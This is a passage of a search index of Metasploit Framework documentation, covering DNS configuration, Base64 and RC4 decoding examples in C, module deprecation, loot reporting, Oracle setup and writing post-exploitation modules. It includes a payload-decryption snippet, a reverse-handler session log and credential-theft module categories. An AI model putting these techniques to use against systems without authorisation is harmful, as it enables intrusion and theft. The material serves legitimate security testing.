    "content": "Most applications that need to handle hostname to IP address lookups rely on the host operating system, either by passing the hostname directly to the socket-creation function or by calling a purpose-built API such as getaddrinfo. This was also how Metasploit handled name lookups: it would only communicate directly with a DNS server when the request was more involved than mapping a hostname to an IPv4 or IPv6 address. One flaw in this approach is that when pivoting connections over a session, the DNS lookups would occur through the host on which Metasploit was running instead of the compromised host from which the connection would originate. This led to two issues, the first being the DNS leak just described and the second that Metasploit could not always resolve hostnames that the compromised system could. Starting in Metasploit 6.4, Metasploit uses an internal DNS resolution system that grants the user a high degree of control over the process of DNS queries. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#background",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#background"
  },"225": {
    "doc": "How to Configure DNS",
    "title": "The DNS command",
    "content": "Metasploit’s DNS configuration is controlled by the dns command, which has multiple subcommands. The current configuration can be printed by running dns print: . msf6 > dns print Default search domain: N/A Default search list: lab.lan Current cache size: 0 Resolver rule entries ===================== # Rule Resolver Comm channel - ---- -------- ------------ 1 * . \\_ static N/A . \\_ 127.0.0.53 Static hostnames ================ Hostname IPv4 Address IPv6 Address -------- ------------ ------------ localhost 127.0.0.1 ::1 \\_ 127.1.1.1 localhost.localdomain 127.0.0.1 ::1 localhost4 127.0.0.1 localhost4.localdomain4 127.0.0.1 localhost6 ::1 localhost6.localdomain6 ::1 . The help subcommand can be used to display the available subcommands. The name of a subcommand can also be specified as an argument to help to display additional information about that subcommand, for example dns help add. Metasploit’s DNS system is composed of the following major components: resolver rules, static entries and the cache. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-command",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-command"
  },"226": {
    "doc": "How to Configure DNS",
    "title": "DNS Resolver Rules",
    "content": "A DNS resolver rule is a single wildcard pattern that is associated with zero or more resolvers. When a query name matches the wildcard expression, the associated resolvers are used in succession until one is capable of fulfilling the request. For example, a wildcard pattern of *.lab.lan would match www.lab.lan and _ldap._tcp.lab.lan, but not lab.lan or msflab.lan. The * wildcard pattern matches everything and should be used as a default rule. Once a rule that matches the query name is found, the specified resolvers will be tried in order until one is capable of handling the request. Different resolver types can be specified to handle queries in different ways. Rules are listed in numeric order starting at position 1. Rules can be added to or removed from specific positions in a similar manner to how iptables rules can be added to and removed from a specific chain. The Black Hole Resolver . The black hole resolver can be used to prevent queries from being resolved. It handles all query types and will prevent resolvers defined after it from being used. The black hole resolver is specified by using the black-hole keyword. The Upstream Resolver . An upstream resolver can be used by specifying either an IPv4 or IPv6 address. When Metasploit uses this resolver, the defined host will be contacted over the network. A session can optionally be defined through which network traffic will be sent. The System Resolver . The system resolver can be used for hostname resolution to either IPv4 or IPv6 addresses by invoking the host operating system’s API. This is particularly useful in cases where the system’s API is expected to be hooked by an external entity such as proxychains. The system resolver is specified by using the system keyword. Queries that cannot be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is configured in the rule. The Static Resolver . 
The static resolver can be used for hostname resolution to either IPv4 or IPv6 addresses through a static mapping that is configured within Metasploit. This functionality is analogous to the hosts file found on many systems, which defines static hostname to IP address associations. The static resolver is specified by using the static keyword. Queries that cannot be fulfilled by simply translating the query name to an IP address (e.g. PTR, TXT and SRV queries) will use the next resolver that is configured in the rule. See Static DNS Entries for configuring static entries. Example Rules . Define a single rule in the first position to handle all queries through three resolvers, first checking whether there is a static entry in Metasploit, then using the system resolver, and finally specifying an upstream DNS server to handle any other query type. dns add --index 1 --rule * static system 192.0.2.1 . Append a rule to the end that will handle all queries for *.lab.lan using an upstream server contacted through session 1. dns add --rule *.lab.lan --session 1 192.0.2.1 . Append a rule to drop all queries for *.noresolve.lan using the black hole resolver. dns add --rule *.noresolve.lan black-hole . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#dns-resolver-rules",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#dns-resolver-rules"
  },"227": {
    "doc": "How to Configure DNS",
    "title": "Static DNS Entries",
    "content": "Static entries used by the static resolver are configured through the add-static and remove-static subcommands. The currently configured entries can be viewed in the dns print output and all entries can be flushed with the flush-static subcommand. Static entries that are configured are shared across all rules in which a static resolver is specified. In order for the static entry to be used, at least one rule must match the hostname, and that rule must be configured to use the static resolver. A single hostname can be associated with multiple IP addresses and the same IP address can be associated with multiple hostnames. Example Static Entries . Define static entries for localhost and common variations. dns add-static localhost 127.0.0.1 ::1 dns add-static localhost4 127.0.0.1 dns add-static localhost6 ::1 . Remove all static entries for localhost. dns remove-static localhost . Remove all static entries. dns flush-static . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#static-dns-entries",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#static-dns-entries"
  },"228": {
    "doc": "How to Configure DNS",
    "title": "The DNS Cache",
    "content": "DNS query replies are cached internally by Metasploit based on their TTL. This is intended to minimize the amount of network traffic required to perform the necessary lookups. The number of query replies that are currently cached is available in the dns print output and all replies can be flushed with the flush-cache subcommand. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-cache",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#the-dns-cache"
  },"229": {
    "doc": "How to Configure DNS",
    "title": "Configuration Management",
    "content": "The DNS configuration can be saved using the save command from the msfconsole command context. Once saved, the settings will be automatically restored the next time Metasploit starts up. Any changes that are made at runtime will be lost when Metasploit exits, unless the save command is used. Resetting the Configuration . The DNS configuration can be restored to the default state by using the reset-config subcommand. The default configuration: . | Populates the static entries from the host operating system’s hosts file | Defines a single rule that matches all query names, whose first resolver is the static resolver and whose remaining resolvers are set from the host operating system’s resolv.conf file | . ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#configuration-management",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#configuration-management"
  },"230": {
    "doc": "How to Configure DNS",
    "title": "Resolving hostnames",
    "content": "The resolve subcommand can be used to resolve a hostname to either an IPv4 or IPv6 address. In doing so, the rule that was used to define the resolvers will be printed allowing the wildcard matching logic to be tested. ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html#resolving-hostnames",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html#resolving-hostnames"
  },"231": {
    "doc": "How to Configure DNS",
    "title": "How to Configure DNS",
    "content": " ",
    "url": "/docs/using-metasploit/advanced/how-to-configure-dns.html",
    "relUrl": "/docs/using-metasploit/advanced/how-to-configure-dns.html"
  },"232": {
    "doc": "Base64 Support",
    "title": "Description",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#description",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#description"
  },"233": {
    "doc": "Base64 Support",
    "title": "How to decode Base64 with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for Base64 encoding and decoding, which is implemented as base64.h. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#how-to-decode-base64-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#how-to-decode-base64-with-metasploitframeworkcompiler"
  },"234": {
    "doc": "Base64 Support",
    "title": "Code Example",
    "content": "#include <Windows.h> #include <String.h> #include <base64.h> // \"hello world\" encoded by Rex::Text.encode_base64() #define BASE64STR \"aGVsbG8gd29ybGQ=\" int main() { int base64StrLen = strlen(BASE64STR); LPVOID lpBuf = VirtualAlloc(NULL, sizeof(int) * base64StrLen, MEM_COMMIT, PAGE_EXECUTE_READWRITE); memset(lpBuf, '\\0', base64StrLen); base64decode(lpBuf, BASE64STR, base64StrLen); MessageBox(NULL, (char*) lpBuf, \"Base64 Test\", MB_OK); return 0; } . To compile, see How to use Metasploit::Framework::Compiler::Windows to compile C code. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html#code-example"
  },"235": {
    "doc": "Base64 Support",
    "title": "Base64 Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decode-base64-with-metasploit-framework-compiler.html"
  },"236": {
    "doc": "RC4 Support",
    "title": "How to decrypt RC4 with Metasploit::Framework::Compiler",
    "content": "The Metasploit C compiler has built-in support for RC4 encryption and decryption, which is implemented as the rc4.h header. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#how-to-decrypt-rc4-with-metasploitframeworkcompiler",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#how-to-decrypt-rc4-with-metasploitframeworkcompiler"
  },"237": {
    "doc": "RC4 Support",
    "title": "Code Example",
    "content": "#include <Windows.h> #include <rc4.h> #define PAYLOADSIZE 12 #define RC4KEY \"4ASMkFslyhwXehNZw048cF1Vh1ACzyyA\" int main(void) { unsigned char payload[] = \"\\xd8\\xb0\\xe9\\x5a\\x89\\xc2\\xee\\x43\\xb9\\x30\\xd0\\x86\"; int lpBufSize = sizeof(int) * PAYLOADSIZE; LPVOID lpBuf = VirtualAlloc(NULL, lpBufSize, MEM_COMMIT, 0x04); memset(lpBuf, '\\0', lpBufSize); RC4(RC4KEY, payload, (char*) lpBuf, PAYLOADSIZE); MessageBox(NULL, (char*) lpBuf, \"Test\", MB_OK); return 0; } . To compile, use Metasploit::Framework::Compiler::Windows.compile_c. ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#code-example",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html#code-example"
  },"238": {
    "doc": "RC4 Support",
    "title": "RC4 Support",
    "content": " ",
    "url": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html",
    "relUrl": "/docs/development/developing-modules/libraries/c/how-to-decrypt-rc4-with-metasploit-framework-compiler.html"
  },"239": {
    "doc": "How to deprecate a Metasploit module",
    "title": "Usage",
    "content": "To use the Msf::Module::Deprecated, here’s how: . 1 - Under class MetasploitModule of your module, include the following: . include Msf::Module::Deprecated . 2a - When moving a module, use the moved_from method in the new module to add an alias to the old module name: . moved_from 'auxiliary/analyze/jtr_windows_fast' . 2b - Use the deprecated method to assign a deprecation date and replacement module: . deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth') . 2c - Alternatively, define the DEPRECATION_DATE and DEPRECATION_REPLACEMENT constants: . DEPRECATION_DATE = Date.new(2014, 9, 21) # Sep 21 # The new module is exploit/linux/http/dlink_upnp_exec_noauth DEPRECATION_REPLACEMENT = 'exploit/linux/http/dlink_upnp_exec_noauth' . When the user loads that module, they should see a warning like this: . msf > use exploit/windows/misc/test [!] ************************************************************************ [!] * The module windows/misc/test is deprecated! * [!] * It will be removed on or about 2014-09-21 * [!] * Use exploit/linux/http/dlink_upnp_exec_noauth instead * [!] ************************************************************************ . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#usage",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#usage"
  },"240": {
    "doc": "How to deprecate a Metasploit module",
    "title": "Code example",
    "content": "class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Module::Deprecated deprecated(Date.new(2014, 9, 21), 'exploit/linux/http/dlink_upnp_exec_noauth') def initialize(info = {}) super( update_info( info, 'Name' => 'Msf::Module::Deprecated Example', 'Description' => %q{ This shows how to use Msf::Module::Deprecated. }, 'Author' => [ 'sinn3r' ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://metasploit.com' ] ], 'DisclosureDate' => '2014-04-01', 'Targets' => [ [ 'Automatic', {} ] ], 'DefaultTarget' => 0 ) ) end def exploit print_debug('Code example') end end . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#code-example",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html#code-example"
  },"241": {
    "doc": "How to deprecate a Metasploit module",
    "title": "How to deprecate a Metasploit module",
    "content": "Metasploit has a very specific way to deprecate a module. To do so, you must be using the Msf::Module::Deprecated mixin. You must use this mixin for two reasons: . | You are required to set a deprecation date. That way we know when to remove it, which is done manually. | You are optionally allowed to set a replacement for the module you wish to deprecate. | . ",
    "url": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html",
    "relUrl": "/docs/development/maintainers/process/how-to-deprecate-a-metasploit-module.html"
  },"242": {
    "doc": "Reporting and Storing Data",
    "title": "Reporting and Storing Data",
    "content": ". | store_loot() - Used to store both stolen files (both text and binary) and “screencaps” of commands such as ps -ef and ifconfig. The file itself need not be of forensic-level integrity – it may be parsed by a post module to extract only the relevant information for a penetration tester. | report_auth_info() - Used to store working credentials that are immediately reusable by another module. For example, a module dumping the local SMB hashes would use this, as would a module which reads username:password combinations for a specific host and service. Conversely, merely “likely” usernames and passwords should use store_loot() instead. | report_vuln() - Auxiliary and post modules that exercise a particular vulnerability should call report_vuln() upon success. Note that exploit modules automatically call report_vuln() as part of opening a session (there is no need to call it explicitly). | report_note() - Modules should make an effort to avoid report_note() when one of the above methods would be a better fit, but there are often cases where “loot” or “cred” or “vuln” classifications are not immediately appropriate. report_note() calls should always set an OID-style dotted :type, such as domain.hosts, so other modules may easily find them in the database. | report_host() - Reports a host’s liveness and attributes such as operating system and service pack. This is less common because other reporting methods already do this, such as report_service, report_exploit_success, report_client, report_note, report_host_tag, report_vuln, report_event, report_loot, etc. Try not to repeat it. | report_service() - Reports a new service (port) that’s been detected by your module. | report_client() - Reports a client running on a host, such as a web browser. | report_web_site() - Reports a website, which must be tied to an existing :service. If there is no :service, you will have to supply :host, :port and :ssl. 
| report_web_page() - You can use this if your module discovers a web page that looks interesting. | report_web_form() - You can use this if your module discovers web forms that look interesting. | report_web_vuln() - Reports a web application vulnerability. Exploits don’t really need to use this. It’s more suitable for auxiliary modules that exercise a bug to determine that the target is vulnerable. | report_loot() - Very rarely, modules might actually want to export loot without using store_loot(). Typically they do this with Ruby’s file IO, but this won’t be logged in the database, so it can’t be tracked by Metasploit Framework. In that case, a report_loot() call is needed. However, 99.9% of the time you should be using store_loot(). | . References . | Guidelines for Accepting Modules and Enhancements | https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/auxiliary/report.rb | . ",
    "url": "/docs/development/developing-modules/libraries/how-to-do-reporting-or-store-data-in-module-development.html",
    "relUrl": "/docs/development/developing-modules/libraries/how-to-do-reporting-or-store-data-in-module-development.html"
  },"243": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "Install the Oracle Instant Client",
    "content": "As root, create the directory /opt/oracle. Then download the Oracle Instant Client packages for your version of Kali Linux. The packages you will need are: . | instantclient-basic-linux-12.2.0.1.0.zip | instantclient-sqlplus-linux-12.2.0.1.0.zip | instantclient-sdk-linux-12.2.0.1.0.zip | . Unzip these under /opt/oracle, and you should now have a path called /opt/oracle/instantclient_12_2/. Next, create a link so the Oracle client library is also available under the unversioned name libclntsh.so: . root@kali:/opt/oracle/instantclient_12_2# ln libclntsh.so.12.1 libclntsh.so root@kali:/opt/oracle/instantclient_12_2# ls -lh libclntsh.so lrwxrwxrwx 1 root root 17 Jun 1 15:41 libclntsh.so -> libclntsh.so.12.1 . You also need to configure the appropriate environment variables, perhaps by inserting them into your .bashrc file, then logging out and back in for them to apply. export PATH=$PATH:/opt/oracle/instantclient_12_2 export SQLPATH=/opt/oracle/instantclient_12_2 export TNS_ADMIN=/opt/oracle/instantclient_12_2 export LD_LIBRARY_PATH=/opt/oracle/instantclient_12_2 export ORACLE_HOME=/opt/oracle/instantclient_12_2 . If you have succeeded, you should be able to run sqlplus from a command prompt: . root@kali:/opt/oracle/instantclient_12_2# sqlplus SQL*Plus: Release 12.2.0.1.0 Production on Tue Mar 26 20:40:24 2019 Copyright (c) 1982, 2016, Oracle. All rights reserved. Enter user-name: . ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-oracle-instant-client",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-oracle-instant-client"
  },"244": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "Install the ruby gem",
    "content": "First, download and extract the gem source release: . root@kali:~# wget https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip --2019-03-26 20:31:11-- https://github.com/kubo/ruby-oci8/archive/ruby-oci8-2.2.7.zip Resolving github.com (github.com)... 192.30.253.113, 192.30.253.112 Connecting to github.com (github.com)|192.30.253.113|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 [following] --2019-03-26 20:31:11-- https://codeload.github.com/kubo/ruby-oci8/zip/ruby-oci8-2.2.7 Resolving codeload.github.com (codeload.github.com)... 192.30.253.120, 192.30.253.121 Connecting to codeload.github.com (codeload.github.com)|192.30.253.120|:443... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [application/zip] Saving to: 'ruby-oci8-2.2.7.zip' ruby-oci8-2.2.7.zip [ <=> ] 376.97K 2.36MB/s in 0.2s 2019-03-26 20:31:11 (2.36 MB/s) - 'ruby-oci8-2.2.7.zip' saved [386016] root@kali:~# unzip ruby-oci8-2.2.7.zip Archive: ruby-oci8-2.2.7.zip 0c85bf6da2f541de3236267b1a1b18f0136a8f5a creating: ruby-oci8-ruby-oci8-2.2.7/ inflating: ruby-oci8-ruby-oci8-2.2.7/.gitignore inflating: ruby-oci8-ruby-oci8-2.2.7/.travis.yml [...] inflating: ruby-oci8-ruby-oci8-2.2.7/test/test_rowid.rb root@kali:~# cd ruby-oci8-ruby-oci8-2.2.7/ . Install libgmp (needed to build the gem) and set the path to prefer the correct version of ruby so that Metasploit can use it. root@kali:~/ruby-oci8-ruby-oci8-2.2.7# export PATH=/opt/metasploit/ruby/bin:$PATH root@kali:~/ruby-oci8-ruby-oci8-2.2.7# apt-get install libgmp-dev Reading package lists... Done Building dependency tree Reading state information... Done Suggested packages: libgmp10-doc libmpfr-dev The following NEW packages will be installed: libgmp-dev 0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded. Need to get 0 B/610 kB of archives. 
After this operation, 1,740 kB of additional disk space will be used. Selecting previously unselected package libgmp-dev:amd64. (Reading database ... 322643 files and directories currently installed.) Unpacking libgmp-dev:amd64 (from .../libgmp-dev_2%3a5.0.5+dfsg-2_amd64.deb) ... Setting up libgmp-dev:amd64 (2:5.0.5+dfsg-2) ... Build and install the gem . root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make ruby -w setup.rb config setup.rb:280: warning: assigned but unused variable - vname setup.rb:280: warning: assigned but unused variable - desc setup.rb:280: warning: assigned but unused variable - default2 ---> lib ---> lib/dbd <--- lib/dbd ---> lib/oci8 <--- lib/oci8 <--- lib ---> ext ---> ext/oci8 /opt/metasploit/ruby/bin/ruby /root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8/extconf.rb checking for load library path... LD_LIBRARY_PATH... checking /opt/metasploit/ruby/lib... no checking /opt/oracle/instantclient_12_2... yes /opt/oracle/instantclient_12_2/libclntsh.so.12.1 looks like an instant client. checking for cc... ok checking for gcc... yes checking for LP64... yes checking for sys/types.h... yes checking for ruby header... ok checking for OCIInitialize() in oci.h... yes [...] linking shared-object oci8lib_250.so make[1]: Leaving directory `/root/ruby-oci8-ruby-oci8-2.2.7/ext/oci8' <--- ext/oci8 <--- ext root@kali:~/ruby-oci8-ruby-oci8-2.2.7# make install ruby -w setup.rb install setup.rb:280: warning: assigned but unused variable - vname setup.rb:280: warning: assigned but unused variable - desc setup.rb:280: warning: assigned but unused variable - default2 ---> lib mkdir -p /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/ install oci8.rb /opt/metasploit/ruby/lib/ruby/site_ruby/2.5.0/ [...] <--- ext root@kali:~/ruby-oci8-ruby-oci8-2.2.7# . ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-ruby-gem",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html#install-the-ruby-gem"
  },"245": {
    "doc": "How to get Oracle Support working with Kali Linux",
    "title": "How to get Oracle Support working with Kali Linux",
    "content": "This is an update of the original blog post about how to get Oracle support working with Metasploit and Kali Linux, found here. Due to licensing issues, we cannot ship Oracle’s proprietary client access libraries by default. As a result, you may see this error when running a Metasploit module: . msf auxiliary(oracle_login) > run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] See http://www.metasploit.com/redmine/projects/framework/wiki/OracleUsage for installation instructions [*] Auxiliary module execution completed msf auxiliary(oracle_login) > run . or . msf5 auxiliary(scanner/oracle/oracle_hashdump) > run [-] Failed to load the OCI library: cannot load such file -- oci8 [-] Try 'gem install ruby-oci8' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed . The general steps to getting Oracle support working are to install the Oracle Instant Client and development libraries, install the required dependencies for Kali Linux, then install the gem. ",
    "url": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html",
    "relUrl": "/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html"
  },"246": {
    "doc": "How to get started with writing a Meterpreter script",
    "title": "How to get started with writing a Meterpreter script",
    "content": ". I tricked you. We don’t let anybody write Meterpreter scripts anymore, therefore we will no longer teach you how. You should try writing post modules instead. ",
    "url": "/docs/using-metasploit/advanced/meterpreter/how-to-get-started-with-writing-a-meterpreter-script.html",
    "relUrl": "/docs/using-metasploit/advanced/meterpreter/how-to-get-started-with-writing-a-meterpreter-script.html"
  },"247": {
    "doc": "Writing a post module",
    "title": "Plan your module",
    "content": "Just like writing any software, before you start coding you should have a clear and specific goal for what your post module does. It’s never a good idea to have multiple functionalities in a single module. For example: having it steal the network configuration files, steal passwd, hashes, shell history, etc. Instead, you should break it down into multiple modules. You should also think about what session types to support: meterpreter, or shell. Ideally, support both. But if you have to choose between the two, on Windows you should favor Windows Meterpreter. On Linux, the shell session type has been a stronger candidate than the Linux Meterpreter, but hopefully this will change in the near future. For platforms that don’t have a Meterpreter, obviously your only choice is a shell. Another important thing is to think about how your module will perform on different distributions/systems. For example, say you want to run an ifconfig command on Linux. On Ubuntu it’s a no-brainer, simply run the ifconfig command. Well, a different Linux distro might not actually know what you’re asking, so you have to be more specific and do /sbin/ifconfig instead. Same thing with Windows. Is it C:\\WINDOWS\\ or C:\\WinNT? It’s both. Is it C:\\Documents and Settings\\[User name], or C:\\Users\\[User name]? Both, depending on the Windows version. A better solution would be to use an environment variable :-) . Always do your homework, and cover as many scenarios as you can think of. And most importantly, get your VMs and TEST! . Categories of post modules . Post modules are categorized based on their behavior. For example, if it collects data, naturally it goes to the “gather” category. If it adds, updates or removes a user, it belongs to “manage”. Here’s a list as a reference: . | Category | Description | . | gather | Modules that involve data gathering/collecting/enumeration. | . | gather/credentials | Modules that steal credentials. | . 
| gather/forensics | Modules that involve forensics data gathering. | . | manage | Modules that modify/operate/manipulate something on the system. Session management related tasks such as migration and injection also go here. | . | recon | Modules that will help you learn more about the system in terms of reconnaissance, but not about data stealing. Understand this is not the same as “gather” type modules. | . | wlan | Modules that are for WLAN related tasks. | . | escalate | This is deprecated, but the modules remain there due to popularity. This used to be the place for privilege escalation modules. Privilege escalation modules are no longer considered post modules; they’re now exploits. | . | capture | Modules that involve monitoring something for data collection. For example: key logging. | . Session object . So you know how in Lord of the Rings, people are totally obsessed with the One Ring? Well, that’s how it is with the session object. The one object you cannot live without, it’s your precious. All post modules and other related mixins are basically built on top of the session object, because it knows everything about the compromised host, and allows you to command it. You can use the session method to access the session object, or its alias client. The best way to interact with one is via irb, here’s an example of how: . msf exploit(handler) > run [*] Started reverse handler on 192.168.1.64:4444 [*] Starting the payload handler... [*] Sending stage (769536 bytes) to 192.168.1.106 [*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.106:55157) at 2014-07-31 17:59:36 -0500 meterpreter > irb [*] Starting IRB shell [*] The 'client' variable holds the meterpreter client >> session.class => Msf::Sessions::Meterpreter_x86_Win . At this point you have the power to rule them all. But notice that the above example is a Msf::Sessions::Meterpreter_x86_Win object. 
There are actually several more different ones: command_shell.rb, meterpreter_php.rb, meterpreter_java.rb, meterpreter_x86_linux.rb, etc. Each behaves differently, so it’s actually kind of difficult to explain them all, but they are defined in the lib/msf/base/sessions/ directory so you can see how they work. Or you can play with one since you’re already in the irb prompt. In Ruby, there are two object methods that are handy for debugging purposes. The first is methods, which will list all the public and protected methods from that object: . session.methods . The other one is inspect, which returns a string of a human-readable representation of the object: . session.inspect . One commonly used method of the session object is the platform method. For example, if you’re writing a post module for a Windows exploit, in the check method you’ll likely want to use session.platform to ensure the target session is affected: . unless session.platform == 'windows' # Non-Windows systems are definitely not affected. return Exploit::CheckCode::Safe end . You can also look at other current post modules and see how they use their session object. The Msf::Post Mixin . As we explained, most post module mixins are built on top of the session object, and there are many out there. However, there is a main one you obviously cannot live without: the Msf::Post mixin. When you create a post module with this mixin, a lot of other mixins are also already included for all kinds of scenarios, to be more specific: . | msf/core/post/common - Common methods post modules use, for example: cmd_exec. | msf/core/post_mixin - Keeps track of the session state. | msf/core/post/file - File system related methods. | msf/core/post/webrtc - Uses WebRTC to interact with the target machine’s webcam. | msf/core/post/linux - There actually isn’t a lot going on, just get_sysinfo and is_root? specifically for Linux. 
| msf/core/post/osx - get_sysinfo, get_users, get_system_accounts, get_groups, and methods for operating the target machine’s webcam. | msf/core/post/solaris - Pretty much like the linux mixin. Same methods, but for Solaris. | msf/core/post/unix - get_users, get_groups, enum_user_directories | msf/core/post/windows - Most of the development time is spent here. From Windows account management, event log, file info, Railgun, LDAP, netapi, powershell, registry, wmic, services, etc. | . Template . Here we have a post module template. As you can see, there are some required fields that need to be filled. We’ll explain each: . ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post def initialize(info = {}) super( update_info( info, 'Name' => '[Platform] [Module Category] [Software] [Function]', 'Description' => %q{ Say something that the user might want to know. }, 'License' => MSF_LICENSE, 'Author' => [ 'Name' ], 'Platform' => [ 'win', 'linux', 'osx', 'unix', 'bsd', 'solaris' ], 'SessionTypes' => [ 'meterpreter', 'shell' ] ) ) end def run # Main method end end . The Name field should begin with a platform, such as: Multi, Windows, Linux, OS X, etc. Followed by the module’s category, such as: Gather, Manage, Recon, Capture, Wlan. Followed by the name of the software, and then finally a few words that describe the functionality of the module. A naming example: “Multi Gather RndFTP Credential Enumeration”. The Description field should explain what the module does, things to watch out for, specific requirements; the more the better. The goal is to let the user understand what he’s using without the need to actually read the module’s source and figure things out. And trust me, most of them don’t. The Author field is where you put your name. The format should be “Name \". 
If you want to have your Twitter handle there, leave it as a comment, for example: \"Name # handle\" . The Platform field indicates what platforms are supported, for example: win, linux, osx, unix, bsd. The SessionTypes field should be either meterpreter, or shell. You should try to support both. And finally, the run method is like your main method. Start writing your code there. Basic git commands . Metasploit no longer uses svn for source code management, instead we use git, so knowing some tricks with git goes a long way. We’re not here to lecture you about how awesome git is, we know it has a learning curve and it’s not surprising to find new users making mistakes. Every once in a while, your git “rage” will kick in, and we understand. However, it’s important for you to take advantage of branching. Every time you make a module, or make some changes to existing code, you should not do so on the default master branch. Why? Because when you do a msfupdate, which is Metasploit’s utility for updating your repository, it will do a git reset before merging the changes, and all your code goes bye-bye. Another mistake people tend to make is having all the changes on master before submitting a pull request. This is a bad idea, because most likely you’re submitting other crap you don’t intend to change, and/or you’re probably asking us to merge other unnecessary commit history when there only needs to be one commit. Thanks for contributing your module to the community, but no thanks to your crazy commit history. So as a habit, when you want to make something new, or change something, begin with a new branch that’s up to date with master. First off, make sure you’re on master. If you do a git status it will tell you what branch you’re currently on: . $ git status # On branch upstream-master nothing to commit, working directory clean . Ok, now do a git pull to download the latest changes from Metasploit: . $ git pull Already up-to-date. At this point, you’re ready to start a new branch. 
In this case, we’ll name our new branch “my_awesome_branch”: . $ git checkout -b my_awesome_branch Switched to a new branch 'my_awesome_branch' . And then you can go ahead and add that module. Make sure it’s in the appropriate path: . $ git add [module path] . When you decide to save the changes, commit (if there’s only one module, you can do git commit -a too so you don’t have to type the module path. Note -a really means EVERYTHING): . $ git commit [module path] . When you’re done, push your changes, which will upload your code to your remote branch “my_awesome_branch”. You must push your changes in order to submit the pull request, or share it with others on the Internet. $ git push origin my_awesome_branch . References . | https://github.com/rapid7/metasploit-framework/tree/master/modules/post | https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/core/post | . ",
    "url": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html#plan-your-module",
    "relUrl": "/docs/development/developing-modules/guides/how-to-get-started-with-writing-a-post-module.html#plan-your-module"
  },"248": {
    "doc": "Writing a post module",
    "title": "Writing a post module",
